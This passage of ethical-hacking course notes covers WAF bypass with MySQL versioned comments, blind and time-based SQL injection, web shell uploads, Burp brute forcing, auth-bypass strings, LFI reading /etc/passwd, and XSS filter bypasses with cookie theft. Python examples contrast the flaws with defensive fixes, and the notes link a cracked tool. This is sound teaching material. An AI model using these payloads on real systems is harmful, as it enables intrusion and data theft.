2. Hardware-based firewalls : a dedicated appliance with its own processor and a configuration panel, usually with more advanced features than a software firewall.
Eg. Juniper, Sophos, Endian etc.
2094
2095IDS
2096===
IDS stands for Intrusion Detection System. It is a software- or hardware-based system that detects suspicious activity and logs it; it can also alert the network administrator immediately, so that they learn there is an intruder in the network.
IDS come in different types such as NIDS (network IDS), HIDS (host IDS), WIDS (wireless IDS) etc.
2099
2100IPS
2101===
IPS stands for Intrusion Prevention System. It goes one step further than an IDS: it sits inline and blocks the malicious traffic of an intruder immediately, instead of only logging it.
2103
2104EG. of IDS and IPS - SNORT etc.
2105
2106HONEYPOTS
2107=========
A honeypot is a decoy: a web application, network system or wireless access point that looks perfectly normal but exists only to attract and trap attackers, so that their activity can be observed.
2109
2110------------------------------------------------------------------
2111
2112MISCOFIGURED WAF
2113=================
2114
INTRODUCTION TO WAF - A web application firewall works like a network firewall, with rule sets for inbound and outbound traffic, but it protects a web application or web site rather than a network. A WAF inspects HTTP and HTTPS traffic (above the TCP/UDP layer that a network firewall sees) and ships with mitigation rules for the OWASP Top 10 attacks.
2116
2117
FOR EG. ModSecurity
2119
2120----------------------------------------------------
2121INSTALLING AND CONFIGURING MOD SECURITY WAF (JUST FOR REFERENCE)
2122================================================================
2123
2124OS - UBUNTU 14.04
2125
2126Mod Security WAF
2127
2128------------------------------------------------------------------------------------------
2129
2130BYPASSING MOD WAF
2131==================
2132
2133
2134Steps :-
2135
= Find a GET parameter.
= Generate a SQL syntax error with (').
= Count the columns with ORDER BY.
= Find the reflected columns with UNION SELECT.
= This time the UNION SELECT request is blocked by the WAF (a 403 or "Not Acceptable" page instead of a result), because its rule set matches the keywords.
2141
2142
Inline executable comments -

Ordinary comment: /* sanjeev */ is ignored by MySQL.

 start - /*!
 end - */

MySQL version-specific comment: /*!sanjeev*/ is executed by MySQL as if the comment markers were not there, while other databases and many WAF rules treat it as a comment.

Changing the case

 union select > uNiOn SeLECt


Inline executable comments
---------------------------
Union - /*!UniOn*/
Select - /*!SelECt*/
The comment may carry a version number: /*!50000 ... */ is executed only if the MySQL server version is at least that number. The version is written without the periods, eg. 5.00.00 -> 50000, so 50000 matches every 5.x and later server.
2162
So to check that versioned inline comments work on the target, we put the version number in front of UNION and SELECT :

= php?id=1' /*!50000UniOn*/ /*!50000SelECt*/ 1,2--+

= To get the database and version :
 /*!50000UniOn*/ /*!50000SelECt*/ database(),version()--+

= To get the table names from information_schema :
 /*!50000UniOn*/ /*!50000SelECt*/ 1,table_name from /*!50000information_schema.tables*/--+

= To get the column names of the users table :
 /*!50000UniOn*/ /*!50000SelECt*/ 1,column_name from /*!50000information_schema.columns*/ where table_name='users'--+

= To get the data :
 /*!50000UniOn*/ /*!50000SelECt*/ 1,/*!50000group_concat(user_id,user,password)*/ from users--+
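Why the case change and the /*!50000 ... */ wrapping get past a naive rule, and what a sound rule does about it, as an added example that is not part of the course and not ModSecurity's rule set: a one-pattern "WAF" is run over the plain payload, the two evasions described above and a benign request, first on the raw request and then after normalising it the way MySQL itself will read it. The requests and the rule are constructed for the example.

```python
import re

# Constructed requests (not from the course): the plain UNION SELECT, the two
# evasions described above, and one benign request.
REQUESTS = {
    "plain":     "1' union select 1,2--+",
    "case":      "1' uNiOn SeLECt 1,2--+",
    "versioned": "1' /*!50000UniOn*/ /*!50000SelECt*/ 1,2--+",
    "benign":    "1",
}

# A naive rule of the kind the evasions get past: case-sensitive and expecting
# exactly one space between the two keywords.
NAIVE_RULE = re.compile(r"union select")

def naive_waf(request):
    return "BLOCK" if NAIVE_RULE.search(request) else "PASS"

def normalise(request):
    """What a sound rule does before matching, mirroring how MySQL reads the
    input: keep the body of /*!NNNNN ... */ comments (MySQL executes it), drop
    ordinary /* ... */ comments, collapse whitespace, fold case."""
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", request)
    s = re.sub(r"/\*.*?\*/", " ", s)
    s = re.sub(r"\s+", " ", s)
    return s.lower()

def better_waf(request):
    return "BLOCK" if NAIVE_RULE.search(normalise(request)) else "PASS"

def verdicts(waf):
    """Run one WAF function over every constructed request."""
    return {name: waf(req) for name, req in REQUESTS.items()}
```

The lesson for the defender is that matching must happen on the same view of the input the database will parse; for the attacker, that every transformation the backend silently undoes (comments, case, whitespace, encoding) is a bypass candidate.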
2178
2179--------------------
2180
2181BLIND BASED SQL INJECTION
2182==========================
2183
Blind SQL injection is the variant in which the application shows neither query results nor SQL errors, yet the injection is still possible.
If the injected condition is true the application shows its normal data; if it is false it shows an empty or generic page (or reloads the same page). That difference is the only information the attacker gets.
2186
2187STEPS
2188=====
1. Find the GET parameter.
2. Test the parameter with (') and with true/false conditions.
3. Count the columns with ORDER BY on an id that returns data.
4. Find the vulnerable column with UNION SELECT.
5. Continue with the same steps as UNION-based SQL injection.
2194
2195Demo of Blind Based Boolean
2196============================
2197 1
2198 1'
2199 1' and 1=0 # ---> False
2200 1' and 1=1 # ---> True
2201 1' and 1=0 order by 1 # --> No Result ---> Generic error
2202 1' and 1=1 order by 1 # --> Result --> normal result
2203 1' and 1=0 order by 2 # --> No result
2204 1' and 1=1 order by 2 # ---> Result
2205 1' and 1=0 order by 3 # ---> No Result
2206 1' and 1=1 order by 3 # ---> No Result ---> True ---> there are 2 number of columns
2207 1' and 1=0 union select 1,2 #
2208 1' and 1=1 union select 1,2 #
2209
2210and so on.
2211
2212TASK
2213=====
22141. PoC on Blind Based SQL Injection .
22152. List of 10 WAF.
2216
2217
2218
2219 SESSION 13
2220 ==========
2221
2222TIME BASED SQL INJECTION
2223========================
Time-based SQL injection is a subcategory of blind SQL injection for the case where the page shows neither data nor errors, not even a true/false difference. The attacker injects a condition tied to a function that makes the database pause (sleep()): if the condition is true the response is delayed, if it is false it comes back at once. The response time is the only information returned, and it is enough to infer the data one question at a time. It is used when there is no other way to retrieve data from the database, and it is the slowest of the injection techniques.
2225
2226DEMONSTRATION
2227===============
2228Target - testphp.vulnweb.com
2229
Using the sleep() function, which delays the response for the given number of seconds.
2231
2232Vulnerable GET Method - http://testphp.vulnweb.com/listproducts.php?cat=2
2233
2234STEPS
2235======
 Find a GET parameter.
Use the sleep query as :

= ?cat=2 and (select sleep(10) from dual where database() like '%')--+
If the condition in the WHERE is true, the response takes about 10 seconds; if it is false, sleep() is never reached and the page returns immediately.


% - wildcard in LIKE, matches any remaining characters
eg. Sanjeev
 Sanj% matches Sanjeev


This lets us test guesses about the database name or any other value. If there is a delay, the guess matches; if not, try the next one.
2249For eg.
2250
- Finding the database name with the sleep query (one prefix at a time, then the full name).

http://testphp.vulnweb.com/listproducts.php?cat=2 and (select sleep(10) from dual where database() like 'acu%')--+


http://testphp.vulnweb.com/listproducts.php?cat=2 and (select sleep(10) from dual where database() like 'acuart')--+

Same for finding the table names:
= http://testphp.vulnweb.com/listproducts.php?cat=2 and (select sleep(10) from information_schema.tables where table_name like 'use%')--+

Finding the column names of our desired table :
= http://testphp.vulnweb.com/listproducts.php?cat=2 and (select sleep(10) from information_schema.columns where table_name='users' and column_name like 'use%')--+
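The prefix-guessing above done to completion, as an added example that is not part of the course: a boolean oracle built only from response time, and a loop that recovers a value one character at a time with LIKE 'prefix%' probes, the way the manual queries above do for acu%, then acuart. No server is involved: the ?cat= endpoint, the products table and the database are constructed, a Python sleep() is registered as a user-defined function to stand in for MySQL's sleep(), and db_name() stands in for database() (both assumptions of the example). The same loop also recovers a table name by putting a subquery in place of the function.

```python
import sqlite3
import string
import time

DELAY = 0.05   # seconds; the notes use sleep(10) against a real server

def build_db():
    con = sqlite3.connect(":memory:")
    con.create_function("sleep", 1, lambda s: time.sleep(s) or 0)   # stand-in for MySQL sleep()
    con.create_function("db_name", 0, lambda: "acuart")             # stand-in for MySQL database()
    con.execute("CREATE TABLE products(id INTEGER, name TEXT)")
    con.execute("INSERT INTO products VALUES (2, 'book')")          # constructed row
    return con

def page_time(con, cat_param):
    """Vulnerable ?cat= endpoint: the only thing we observe is how long it took."""
    t0 = time.perf_counter()
    con.execute(f"SELECT name FROM products WHERE id = {cat_param}").fetchall()
    return time.perf_counter() - t0

def delayed(con, condition):
    """Boolean oracle: sleep() runs only when the WHERE of the subquery is true,
    so a slow response means the condition held."""
    payload = f"2 AND (SELECT sleep({DELAY}) WHERE {condition})"
    return page_time(con, payload) >= DELAY / 2

def extract(con, expr, alphabet=string.ascii_lowercase + string.digits, max_len=32):
    """Recover the value of expr one character at a time with LIKE 'prefix%'.
    '_' and '%' are deliberately not in the alphabet: they are LIKE wildcards."""
    found = ""
    for _ in range(max_len):
        for ch in alphabet:
            if delayed(con, f"{expr} LIKE '{found + ch}%'"):
                found += ch
                break
        else:
            return found          # no character extends the prefix: value complete
    return found
```

Each true probe costs one sleep and each false probe almost nothing, so the cost is roughly one delay per recovered character plus the final round that finds no match; the threshold DELAY / 2 leaves headroom for normal jitter, which on a real network is what makes this technique both slow and noisy.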
2263
2264
2265ARBITRARY FILE UPLOAD
2266=====================
Arbitrary file - in this context an arbitrary file is a file of the attacker's choosing, typically a web shell (a script that executes commands), which, once uploaded to the web application and reachable through the web server, gives the attacker control of the server machine the website is hosted on, including browsing the file system and running operations.
Arbitrary file upload is the situation where the upload feature of a web application accepts such a file without proper validation, so the attacker gets access to the server machine the website is hosted on.

Attack Vectors
============
An attacker can get full control of the server machine.
After getting access to the server, he/she can deface or delete every website hosted there if it is a shared server.
2274
2275Demonstration in DVWA and LVS.
2276
2277------------------------------------------------------------------------------------
2278
2279POST PARAMETER INJECTION
2280==========================
POST parameter injection is the attack vector in which we tamper with and manipulate POST parameters and HTTP headers using tools such as Tamper Data or Burp Suite.
First we intercept the HTTP request moving from the browser to the web server, then edit its parameters before it is forwarded.

Demonstration on the DVWA file upload at medium level: the shell is uploaded with an image extension so that the browser sends an image Content-Type, the request is intercepted in Tamper Data, and the extension of the arbitrary file is changed back to .php before the request reaches the server.
2285
2286TOOLS
2287-------
2288Tamper Data
2289Burpsuite
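The upload checks discussed in the two sections above, as an added example that is not DVWA's code and not part of the course: a check that trusts the client-supplied Content-Type (the kind the tampered request gets past) beside a hardened check that ignores the header and verifies the extension and the file's magic bytes, with a server-chosen storage name. The upload records stand for the multipart part after the attacker has edited it in a proxy and are constructed for the example, including the shell body.

```python
import secrets

# Constructed upload requests (not from the course): the multipart part as it
# would arrive after the attacker edits it in an intercepting proxy.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"   # constructed web shell body

UPLOADS = {
    # a real image: name, client Content-Type and bytes all agree
    "genuine":  {"filename": "photo.png", "content_type": "image/png", "body": PNG_MAGIC + b"\x00" * 16},
    # shell chosen as shell.jpg so the browser sends image/jpeg, then the name
    # is changed back to .php in the proxy; the Content-Type header stays
    "tampered": {"filename": "shell.php", "content_type": "image/jpeg", "body": PHP_SHELL},
    # shell left with an image extension: passes a name check, still PHP inside
    "renamed":  {"filename": "shell.jpg", "content_type": "image/jpeg", "body": PHP_SHELL},
}

def check_content_type_only(upload):
    """Medium-level style check: trusts the client-supplied Content-Type,
    which the attacker controls just as much as the file name."""
    return upload["content_type"] in ("image/jpeg", "image/png")

def check_hardened(upload):
    """Extension allow-list AND magic bytes of the body; the header is ignored."""
    name = upload["filename"]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ("png", "jpg", "jpeg"):
        return False
    body = upload["body"]
    return body.startswith(PNG_MAGIC) or body.startswith(JPEG_MAGIC)

def stored_name(upload):
    """Never keep the client's name: a random server-chosen name with the
    verified extension, so no uploaded file can ever be reached as a script."""
    ext = "png" if upload["body"].startswith(PNG_MAGIC) else "jpg"
    return f"{secrets.token_hex(16)}.{ext}"

def verdicts(check):
    """Run one check over every constructed upload."""
    return {name: check(up) for name, up in UPLOADS.items()}
```

Even the hardened check should be paired with storing uploads outside the web root (or on a host that never executes them), because a polyglot file can carry a valid image header and PHP code at the same time; the magic-byte check raises the bar, the storage location removes the script execution.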
2290
2291----------------------------------------------------------------------------------------------------------
2292
2293Application to automate VAPT
2294=============================
2295
Acunetix demonstration - https://www.acunetix.com/vulnerability-scanner/download/
With installation and report generation.

CVSS score - The Common Vulnerability Scoring System (CVSS) is a free and open industry standard for assessing the severity of security vulnerabilities. CVSS assigns a severity score to each vulnerability, allowing responders to prioritise responses and resources according to the threat.
Websites:
https://nvd.nist.gov/vuln-metrics/cvss

CVE - Common Vulnerabilities and Exposures is a list of publicly known information security vulnerabilities and exposures that gives each one a common identifier. The goal of CVE is to make it easier to share data across separate vulnerability capabilities (tools, repositories and services) with this "common enumeration".
Websites :
https://cve.mitre.org/
https://www.cvedetails.com/
https://nvd.nist.gov/

Exploit-DB - The Exploit Database is an archive of public exploits and the corresponding vulnerable software, maintained by Offensive Security for use by penetration testers and vulnerability researchers.
Websites :
https://www.exploit-db.com/
2312
2313
2314------------
2315
2316
2317
2318 SESSION 14
2319 ==========
2320
2321INTRODUCTION TO BURP SUITE
2322===========================
Burp Suite is a graphical tool for testing web application security. It sits between the browser and the web application as a proxy, so every request and response can be viewed, modified and replayed, which is the basis for vulnerability assessment and penetration testing of a web application.

The tool is written in Java and developed by PortSwigger. We also use Burp Suite for tampering with data moving from one node to another.
2326There are particularly 2 Versions of Burp Suite :
2327
2328= Professional Version $349.00 per user, per year having all the functions.
2329= Community Edition which is free of cost.
2330
2331Features of Burp Suite :
2332================
= Proxy : In Burp Suite everything starts with pointing your browser at Burp's proxy listener (an address and port, 127.0.0.1:8080 by default). Burp then intercepts every request and response and lets you tamper with them as you want: change form methods from GET to POST or vice-versa, unhide hidden fields, enable disabled fields etc.

= Intruder : Burp Intruder automates customised attacks against the web application. It is an efficient request sender and response collector: you mark positions in a captured request, give it payloads (the data, malicious or not, to send in those positions) and an attack mode that defines how the payloads are combined, such as "Sniper" or "Cluster Bomb". It is used to find and exploit unusual vulnerabilities and for brute forcing.

= Scanner : The scanner crawls and audits the web application and detects issues ranging from simple ones, like a password submitted through GET, to advanced vulnerabilities. You can set the scanning speed, pause and resume, choose scan areas and more. (Not available in the Community Edition.)

= Spider : Spidering, or web crawling, is the process of automatically following all the links on a web page to discover both the static and the dynamic resources of the web application.

= Repeater : Repeater takes a request from Target or any other tool and lets you edit and resend it by hand as often as you like, changing the data being sent, the request method, cookie values and any other client-side value.
2343
2344BRUTE FORCING USING BURP SUITE
2345===============================
2346
2347Brute Force Attack : Brute forcing is a trial-and-error method used by application programs to decode encrypted data such as passwords by hit and trial, through exhaustive effort, optionally guided by intelligent strategies.
2348
2349Let us first understand the flaw that makes Brute Forcing work. Brute Forcing works because of a flaw in the filtering on login forms: if there is no extra layer of security and no limit on how many times credentials can be entered, Brute Forcing can be done.
2350
2351Demonstration on DVWA, LVS and demo.testfire.net,
2352using Burp Suite Community Edition.
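As an added example (not from the course or DVWA), the server-side control whose absence the paragraph describes: a per-account failure counter with a lockout window and one generic failure message, so neither the request rate nor the response text helps a wordlist run. The limits, the user table and the injectable clock are assumptions.

```python
import hmac
import time
from collections import defaultdict

# Policy values are assumptions for this example, not DVWA's settings.
MAX_ATTEMPTS = 5        # failures tolerated per account inside the window
WINDOW_SECONDS = 300    # sliding window in which failures are counted
LOCKOUT_SECONDS = 900   # how long the account stays locked after the limit

# Constructed credential store; a real application stores password hashes.
USERS = {"admin": "password"}

# One message for every failure, locked or not, so the response body gives
# no hint which of username / password was wrong and cannot be matched
# against a second "account locked" string either.
FAILURE_MESSAGE = "Username and/or password incorrect."


class AttemptTracker:
    def __init__(self):
        self._failures = defaultdict(list)   # account -> failure timestamps
        self._locked_until = {}              # account -> unlock time

    def is_locked(self, account, now):
        return self._locked_until.get(account, 0) > now

    def _recent_failures(self, account, now):
        recent = [t for t in self._failures[account] if now - t < WINDOW_SECONDS]
        self._failures[account] = recent
        return recent

    def login(self, account, password, now=None):
        """Return (success, message); the clock is injectable for testing."""
        now = time.time() if now is None else now
        if self.is_locked(account, now):
            return False, FAILURE_MESSAGE
        # compare_digest avoids leaking the match position through timing
        if hmac.compare_digest(USERS.get(account, "").encode(), password.encode()):
            self._failures.pop(account, None)
            return True, "Login successful."
        recent = self._recent_failures(account, now)
        recent.append(now)
        if len(recent) >= MAX_ATTEMPTS:
            self._locked_until[account] = now + LOCKOUT_SECONDS
            self._failures.pop(account, None)
        return False, FAILURE_MESSAGE


def simulate_wordlist(tracker, account, wordlist, start=0.0):
    """Replay a Cluster-Bomb-style list, one guess per second, against one
    account; returns how many guesses were actually checked before the lock
    stopped the rest."""
    checked = 0
    for i, guess in enumerate(wordlist):
        now = start + i
        if tracker.is_locked(account, now):
            continue
        checked += 1
        tracker.login(account, guess, now=now)
    return checked
```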
2353
2354STEPS :
2355=======
2356
2357= Open the target Web Application where we want to Brute Force.
2358= Set up the Proxy Settings in the Browser
2359 - Browser Settings > Network Settings > Proxy Configuration > Manual Proxy > Enter a socket on localhost > 127.0.0.1:9500
2360 - Check "Use this proxy server for all protocols"
2361 - Clear all details from "No Proxy for".
2362 - Click on Apply.
2363= Open Burp Suite
2364= Go to Proxy > Options > Enter the proxy socket which we entered in the Browser Settings.
2365= Click on Intercept > Intercept is ON (this will start capturing the moving packets)
2366= Enter anything on the Login Form, either Username or Password or both.
2367= Burp Suite will start blinking.
2368= Burp Suite has captured a packet. Select the packet containing the credentials in Burp Suite > Right Click > Send to Intruder.
2369= Turn off Intercept Mode.
2370= Go to Intruder > Positions > Clear
2371= Select the parameters you want to brute force on.
2372 - Select the value of username > Add
2373 - Select the value of password > Add
2374= Select the Attack Mode
2375= Sniper Mode : if you know either the Username or the Password.
2376= Cluster Bomb Mode : if you don't know anything about the Credentials and you want to brute force both Username and Password.
2377= Go to Payloads > Set up a wordlist in Payloads > Give a default list of random credentials for logging into DVWA or demo.testfire.net
2378= Select values for the Payloads
2379 Payload 1 > list of usernames
2380 Payload 2 > list of passwords
2381= Options > Grep Match > Clear
2382= Add the string "Username and/or password incorrect."
2383= Click on "Start Attack"
2384= Examine the Length column of the payload responses.
2385= Most responses share a common length; click on every different one.
2386= Go to the Response of that payload.
2387= Click on Render (which will show you the rendered web page itself).
2388= Find out the correct Username and Password and enter them.
2389
2390AUTHENTICATION BYPASS USING BURPSUITE
2391======================================
2392
2393When brute forcing with Burp Suite, if the login form does not accept any of the passwords we entered in the Payloads, we can examine whether the website is vulnerable to Authentication Bypass or not.
2394
2395Steps -
2396For Authentication Bypass, we first have to scan for vulnerabilities and check whether Authentication Bypass can happen or not.
2397If yes, we have to put:
2398Username : 1'or'1'='1 Password : 1'or'1'='1
2399Username : admin'or'1'or'1'='1 Password : admin'or'1'or'1'='1
2400Username : x'or'x'='x Password : x'or'x'='x
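Why these strings log in, as an added example that is not the course's or DVWA's code: a login query built by string concatenation beside the parameterised form of the same query, run against a constructed SQLite user table. The table contents and the password are made up.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table for the demo (plaintext password only
    to keep the query readable; a real application stores a salted hash)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Concatenation: a quote in the input closes the literal, so the rest of
    the input is parsed as SQL and the OR '1'='1' makes the WHERE clause true."""
    query = ("SELECT username FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Parameterised query: the values are bound as data, never parsed as SQL,
    so the same input is simply compared against the stored columns."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def bypass_succeeds(login_func, payload):
    """True if sending the payload as both username and password logs in."""
    return login_func(make_db(), payload, payload) is not None
```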
2401
2402-----------------------------------------------------------------------------------------------------------------------------------
2403
2404FILE INCLUSION VULNERABILITY
2405===========================
2406File Inclusion Vulnerability lets an attacker access files which are already present on the Web Server and may contain some critical data.
2407So by accessing those files through the URL, the attacker can read that critical data and misuse it.
2408
2409
2410TYPES OF FILE INCLUSION :
2411
2412= LFI - Local File Inclusion (LFI) vulnerabilities allow an attacker to read (and sometimes execute) files on the victim machine. This can be very dangerous because if the web server is misconfigured and running with high privileges, the attacker may gain access to sensitive information.
2413= RFI - Remote File Inclusion (RFI) vulnerabilities are easier to exploit but less common. Instead of accessing a file on the local machine, the attacker is able to execute code on the Remote Web Application Server.
2414
2415Demonstration of LFI on DVWA.
2416
2417STEPS :
2418(../) - Going one folder backwards.
2419
2420= http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd
2421 The file contents come back in the page output (or inside warnings and errors) by stepping up the directory tree with (../).
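An added example (not DVWA's code) of the server-side check that stops the traversal above: the page parameter is resolved against a fixed document root and rejected if it escapes it, with an optional allowlist for the stricter fix. The root directory and page names are assumptions.

```python
from pathlib import Path

# Assumed document root for include-able pages; not DVWA's real layout.
PAGES_ROOT = Path("/var/www/app/pages")


def resolve_page(page, root=PAGES_ROOT, allowed=None):
    """Map a ?page= value to a file under root.

    Raises ValueError for empty names, embedded NUL bytes, absolute paths,
    any '../' sequence that climbs out of root, and (if an allowlist is
    given) any name not on it."""
    if not page or "\x00" in page:
        raise ValueError("empty or NUL-containing page name")
    if allowed is not None and page not in allowed:
        raise ValueError("page not on allowlist")
    root = root.resolve()
    # Joining an absolute component discards root entirely, which is why the
    # containment check below is needed instead of a string-prefix test.
    candidate = (root / page).resolve()
    if candidate == root:
        raise ValueError("page resolves to the root directory itself")
    try:
        candidate.relative_to(root)          # ValueError if outside root
    except ValueError:
        raise ValueError("path traversal outside document root") from None
    return candidate


def is_safe_page(page, **kwargs):
    """Boolean wrapper for logging/testing: True if the value would be served."""
    try:
        resolve_page(page, **kwargs)
        return True
    except ValueError:
        return False
```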
2422
2423------------------------------------------------------------------------------------------------------------------------------------
2424
2425COMMAND EXECUTION VULNERABILITY
2426=================================
2427Command injection/execution is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data to a system shell (CMD). In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application.
2428
2429Demonstration on LVS and DVWA.
2430
2431STEPS - Pinging on the Input Method of the Web Application.
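An added example, not DVWA's code: the concatenation that makes a ping form injectable beside a version that validates the value as an IP address and runs ping as an argument list without a shell. The ping invocation and the sample inputs are constructed.

```python
import ipaddress
import re
import subprocess

# Shell metacharacters that chain or substitute commands; their presence in a
# "host" field is what a WAF rule or application log check should flag.
SHELL_METACHARS = re.compile(r"[;&|`$<>(){}\n\r]")


def build_ping_vulnerable(host):
    """What the vulnerable form does: the raw value lands in a shell string,
    so anything after a ';' or '&&' becomes a second command."""
    return "ping -c 1 " + host


def validate_host(host):
    """Accept only a literal IPv4/IPv6 address; raise ValueError otherwise."""
    host = host.strip()
    if SHELL_METACHARS.search(host):
        raise ValueError("shell metacharacter in host field")
    return str(ipaddress.ip_address(host))     # ValueError if not an address


def build_ping_safe(host):
    """Return argv for ping; a list passed to subprocess without shell=True is
    never re-parsed, so metacharacters would just be part of one argument."""
    return ["ping", "-c", "1", validate_host(host)]


def is_injection_attempt(host):
    """Detection helper: True if the submitted value is not a plain address."""
    try:
        validate_host(host)
        return False
    except ValueError:
        return True


def run_ping(host, timeout=5):
    """Run the validated command; returns (exit code, stdout)."""
    proc = subprocess.run(build_ping_safe(host), capture_output=True,
                          text=True, timeout=timeout)
    return proc.returncode, proc.stdout
```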
2432
2433------------------------------------------------------------------------------------------------------------------------------------
2434
2435TASK
2436=====
24371. Find 5 commands that can work for Command Execution/Injection.
24382. What is the passwd file on the server?
24393. POC of Brute Forcing on DVWA with both Usernames and Passwords using Cluster Bomb. (Should be short)
2440
2441
2442Authentication Bypass cheatsheet -
2443https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
2444https://tipstrickshack.blogspot.com/2013/01/sql-injection-authentication-bypass.html
2445
2446BurpUnlimited - https://ufile.io/02m9z
2447
2448
2449
2450 SESSION 15
2451 ==========
2452
2453INTRODUCTION TO JAVASCRIPTS
2454============================
2455JavaScript is a programming language commonly used in web development. It was originally developed by Netscape as a means to add dynamic and interactive elements to websites.
2456
2457Java vs JavaScript
2458
2459Java is a general software programming language, but JavaScript is meant for the development of Web Applications and is generally used in front-end development.
2460JavaScript is concerned with the behaviour of web pages depending on user input. It is mainly deployed on dynamic web pages for validation purposes.
2461For example : a simple JavaScript code can create and show a Prompt Box or Alert Box etc.
2462
2463Usually JavaScript is used with HTML. For using JavaScript, we use tags like <script> etc.
2464
2465They use Tags and functions like :
2466
2467
2468alert(document.cookie)
2469
2470alert()
2471prompt()
2472document.write
2473document.cookie
2474functions
2475loops
2476conditions
2477
2478Syntax Of Javascripts
2479======================
2480
2481
2482<script> : </script>
2483
2484<script> = Starting Tag
2485
2486</script> = Ending Tag
2487
2488<script>
2489.
2490.
2491.
2492</script>
2493
2494TAGS :
2495
2496= alert() : This function is used to draw a pop-up box known as a dialog box. Whatever is written in the body of the function is shown as text on the box.
2497
2498
2499
2500SYNTAX : <script>alert("String Based / Integer Based")</script>
2501
2502eg.
2503<script>alert("Welcome to this site")</script>
2504
2505Syntax : <script>alert()</script>
2506
2507Here we can write two types of data: string based and integer based.
2508
2509<script>alert("Welcome to Site")</script>
2510
2511<script>alert("123")</script>
2512
2513= prompt : It is the same as alert but also gives a text field to write your own text. But that text does not affect the working of the pop-up, so in effect it is read only.
2514
2515<script>prompt("hi")</script>
2516
2517= Stealing Cookies with JavaScript
2518
2519Stealing Sessions via Cookies
2520
2521Function : document.cookie
2522
2523Every website sets a cookie and a corresponding session in browser memory, hence if we are able to get the cookie we can embed the same cookie in our browser, and as we open the same site we will enter the same session as the victim.
2524
2525<script>alert(document.cookie)</script>
2526
2527----------------------------------------------------------
2528
2529XSS - CROSS SITE SCRIPTING
2530===========================
2531
2532Cross-site Scripting (XSS) refers to a client-side code injection attack wherein an attacker can inject malicious scripts into a Web Application, and the Web Application responds according to them. The end user's browser has no way to know that the script should not be trusted, and will execute the script because it thinks the script came from a trusted source.
2533It is the 3rd vulnerability in the OWASP Top 10, found in roughly 80% of all dynamic websites.
2534
2535Flaw of XSS
2536============
2537When any website takes any kind of executable input from an unauthorised visitor, then we can say that website is vulnerable to XSS attack.
2538For example : while shopping on Flipkart, a user enters <h1>Hacked</h1> in the search bar, and as he hits search the website interprets the heading tag and renders it on the main page.
2539
2540TYPES OF XSS
2541=============
2542
25431. Stored XSS : Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database. That is, it is permanent until the database is reset or the query is manually removed.
25442. Reflected XSS : Reflected attacks are those where the injected script is reflected off the web server; that means it is not stored, just reflected back. When the web page is refreshed, the XSS query will be gone. One-time use, but it extracts data.
25453. DOM Based XSS : Document Object Model based XSS is a type of cross site scripting attack which relies on inappropriate handling, in the HTML page, of the data from its associated DOM, e.g. in document.write etc.
2546
2547DEMONSTRATION on LVS and DVWA
2548=============================
2549
2550STEPS
2551=====
2552
2553= Finding an XSS-vulnerable web application: DVWA and LVS.
2554= Reflected XSS (LOW in DVWA, LVS)
2555 = <script>alert("hacked")</script> // this will create a pop-up showing "hacked"
2556= Stored XSS (LOW in DVWA, LVS)
2557 = Name : kartik Message : <script>alert("xss vulnerability")</script> // stored in the database.
2558
2559= Reflected XSS (MEDIUM in DVWA, LVS)
2560 Here <script>alert("test")</script> will not work, because the source code performs validation checks and sanitization.
2561
2562Validation check / sanitization : replace "<script>" with nothing.
2563
2564= Ways to bypass XSS in medium security
2565 1. <script> <script>
2566 2. <script lan=eng>
2567 3. <ScRipt>
2568 4. <scr<script>ipt> ---> the filter removes the inner <script> ---> <script> remains
2569
2570 = <ScRiPt>alert("test")</script>
2571
2572
2573= Cookie Stealing
2574 To steal the cookie of the website > target (document.cookie)
2575 <ScRiPt>alert(document.cookie)</script>
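Why the medium-level filter falls to the variants listed above, as an added example that is not DVWA's source: the replace-based blacklist beside output encoding, with a check that reports whether a script tag survives. The payloads are the ones on the page.

```python
import html
import re

# Matches an opening script tag regardless of case and spacing.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def medium_filter(user_input):
    """Blacklist in the style of the medium level: remove the literal string.
    It is case sensitive, so it misses <ScRiPt>, and after stripping the
    inner tag from <scr<script>ipt> it leaves a fresh <script> behind."""
    return user_input.replace("<script>", "")


def escape_output(user_input):
    """Output encoding: every < > & " ' becomes an entity, so the browser
    renders the text instead of parsing it as markup; no blacklist needed."""
    return html.escape(user_input, quote=True)


def script_survives(payload, sanitizer):
    """True if an executable script tag remains after sanitizer(payload)."""
    return SCRIPT_TAG.search(sanitizer(payload)) is not None


# The page's own bypass variants, as constructed test inputs.
BYPASS_PAYLOADS = [
    '<ScRipt>alert("test")</script>',
    '<scr<script>ipt>alert("test")</script>',
    '<script lan=eng>alert("test")</script>',
]
```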
2576
2577
2578-------------------------------------------------------------------------------------------------------------
2579
2580
2581https://lucideustech.blogspot.in/2018/03/a-definitive-guide-to-session-hijacking.html
2582
2583------------------------------------------------------------------------------------------------------------
2584
2585BROKEN AUTHENTICATION AND SESSION MANAGEMENT
2586=============================================
2587
2588Broken Authentication and Session Management are two different vulnerabilities. Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities.
2589Broken Authentication covers the weak login credentials or weak authentication checks a Web Application has, and broken Session Management leads to the exposure of sensitive Session IDs.
2590
2591
2592Demonstration of Broken Authentication and Session Management in LVS.
2593
2594Session Management Example :
2595
2596pnb login > session created > session id = 123545677gcccgz89
2597
